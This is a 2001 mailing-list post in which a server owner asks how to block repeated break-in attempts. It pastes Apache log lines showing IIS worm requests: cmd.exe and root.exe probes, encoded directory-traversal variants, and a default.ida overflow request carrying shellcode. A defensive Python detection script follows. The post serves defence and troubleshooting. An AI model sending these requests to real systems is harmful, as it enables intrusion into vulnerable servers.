
sslug-teknik team mailing list archive

Hacker wannabes

 

Hello

Within the last 24 hours I have received a couple of break-in attempts from
just under 20 different IP addresses. They all use roughly the same exploits,
which funnily enough are a Microsoft thing and will not be able to hit me. In
other words, it is not Kevin Mitnick I am dealing with.
It is, however, rather annoying. Can you set up your firewall to
reject the attempts, or at least set Apache to send them an
HTML/PHP page with a warning?
Other suggestions?
Strange that so many attempts with the same technique come at the same time!!

The following are a few lines from my access log:

212.217.79.226 - - [24/Sep/2001:09:18:26 +0200] "GET
/scripts/root.exe?/c+dir HTTP/1.0" 404 292
212.217.79.226 - - [24/Sep/2001:09:18:30 +0200] "GET
/MSADC/root.exe?/c+dir HTTP/1.0" 404 290
212.217.79.226 - - [24/Sep/2001:09:18:34 +0200] "GET
/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 300
212.217.79.226 - - [24/Sep/2001:09:18:38 +0200] "GET
/d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 300
212.217.79.226 - - [24/Sep/2001:09:18:42 +0200] "GET
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 314
212.217.79.226 - - [24/Sep/2001:09:18:43 +0200] "GET
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 331
212.217.79.226 - - [24/Sep/2001:09:18:47 +0200] "GET
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 331
212.217.79.226 - - [24/Sep/2001:09:18:48 +0200] "GET
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 347
212.217.79.226 - - [24/Sep/2001:09:18:52 +0200] "GET
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 313
212.217.79.226 - - [24/Sep/2001:09:19:05 +0200] "GET
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 313
212.217.79.226 - - [24/Sep/2001:09:19:07 +0200] "GET
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 313
212.217.79.226 - - [24/Sep/2001:09:19:08 +0200] "GET
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 313
212.217.79.226 - - [24/Sep/2001:09:19:12 +0200] "GET
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 297
212.217.79.226 - - [24/Sep/2001:09:19:15 +0200] "GET
/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 297
212.217.79.226 - - [24/Sep/2001:09:19:19 +0200] "GET
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 314
212.217.79.226 - - [24/Sep/2001:09:19:23 +0200] "GET
/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 314
212.158.24.240 - - [24/Sep/2001:09:33:17 +0200] "GET
/default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
HTTP/1.0" 404 287

What would you do in my place?

Kind regards
Robert
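
An added example, not part of the original post: one way to spot requests like those in the log above is to percent-decode the request path repeatedly (so `%255c`, `%25%35%63` and `%%35c` all collapse to a backslash) and then count signature hits per source address. The function names, signature labels and sample lines are assumptions constructed for illustration; the sample uses documentation addresses and a shortened `default.ida` query.

```python
import re
from collections import Counter
from urllib.parse import unquote

# Constructed sample in Apache common log format, modelled on the post's lines.
SAMPLE_LOG = """\
192.0.2.10 - - [24/Sep/2001:09:18:26 +0200] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 292
192.0.2.10 - - [24/Sep/2001:09:18:42 +0200] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 314
192.0.2.10 - - [24/Sep/2001:09:19:15 +0200] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 297
198.51.100.7 - - [24/Sep/2001:09:33:17 +0200] "GET /default.ida?XXXXXXXX%u9090%u6858=a HTTP/1.0" 404 287
203.0.113.5 - - [24/Sep/2001:09:40:00 +0200] "GET /index.html HTTP/1.0" 200 1024
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) \S+$')
# Hypothetical signature labels, matched against the decoded, normalised path.
SIGNATURES = [
    ("cmd-shell", re.compile(r"/(cmd|root)\.exe$")),
    ("ida-request", re.compile(r"/default\.ida$")),
    ("traversal", re.compile(r"(^|/)\.\.(/|$)")),
]

def fully_decode(path, max_rounds=5):
    # Decode until stable: %255c -> %5c -> backslash. Bounded to avoid long loops.
    for _ in range(max_rounds):
        decoded = unquote(path, encoding="latin-1")
        if decoded == path:
            break
        path = decoded
    return path

def classify(request_target):
    # Drop the query string, decode, treat backslash as slash, ignore case.
    path = request_target.split("?", 1)[0]
    norm = fully_decode(path).replace("\\", "/").lower()
    return [name for name, rx in SIGNATURES if rx.search(norm)]

def scan(log_text):
    # Return {source_ip: Counter(signature -> hits)} for flagged requests only.
    hits = {}
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not a common-log-format line
        for name in classify(m.group(3)):
            hits.setdefault(m.group(1), Counter())[name] += 1
    return hits

if __name__ == "__main__":
    for ip, counts in scan(SAMPLE_LOG).items():
        print(ip, dict(counts))
```

The per-address counts can feed whatever blocking or reporting step is in use; wrapped log lines, as in the mail above, need to be rejoined before parsing.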


